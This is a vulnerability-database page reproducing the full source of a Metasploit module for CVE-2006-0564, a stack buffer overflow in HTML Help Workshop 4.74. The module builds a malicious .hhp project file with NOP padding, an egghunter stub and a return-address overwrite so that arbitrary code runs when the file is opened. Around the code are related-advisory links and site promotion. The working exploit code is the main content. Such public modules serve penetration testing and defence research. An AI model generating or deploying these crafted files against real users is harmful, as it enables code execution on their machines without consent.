Lucene search
K

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow

🗓️ 08 Dec 2009 20:20:30Reported by bratax, jduck <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 23 Views

HTML Help Workshop 4.74 Buffer Overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2006-0564
12 Jan 200900:00
circl
CVE
CVE-2006-0564
6 Feb 200623:00
cve
Cvelist
CVE-2006-0564
6 Feb 200623:00
cvelist
Exploit DB
Microsoft HTML Help Workshop 4.74 - &#039;.hhp&#039; Cotent Buffer Overflow (Metasploit) (2)
25 Sep 201000:00
exploitdb
Exploit DB
Microsoft HTML Help Workshop 4.74 - &#039;.hhp&#039; compiled Buffer Overflow (Metasploit) (4)
25 Sep 201000:00
exploitdb
Metasploit
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
8 Dec 200920:20
metasploit
NVD
CVE-2006-0564
6 Feb 200623:02
nvd
Packet Storm
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
31 Dec 200900:00
packetstorm
Prion
Stack overflow
6 Feb 200623:02
prion
Prion
Buffer overflow
15 Jan 200917:30
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in HTML Help Workshop 4.74
        By creating a specially crafted hhp file, an attacker may be able
        to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'bratax', 'jduck' ],
      'References'     =>
        [
          [ 'CVE', '2006-0564'],
          [ 'OSVDB', '22941'],
          [ 'EDB', '1488' ],
          [ 'EDB', '1490' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00\x0a\x0d\x1a\x2f\x5c",
          'StackAdjustment' => -4800,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP English SP3', { 'Offset' => 242, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2006-02-06',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME',   [ false, 'The file name.', 'msf.hhp']),
        ])

  end

  def exploit

    # use the egghunter!
    eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

    off = target['Offset']
    idxf = ""
    idxf << make_nops(off - eh_stub.length)
    idxf << eh_stub
    idxf << [target.ret].pack('V')

    sploit = "[OPTIONS]\r\n"
    sploit << "Compiled file="
    sploit << idxf
    sploit << "\r\n"
    sploit << "\r\n"
    sploit << "[FILES]\r\n"
    sploit << "\r\n"
    sploit << eh_egg

    hhp = sploit

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(hhp)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.5Low risk
Vulners AI Score0.5
CVSS 27.5
EPSS0.71457
23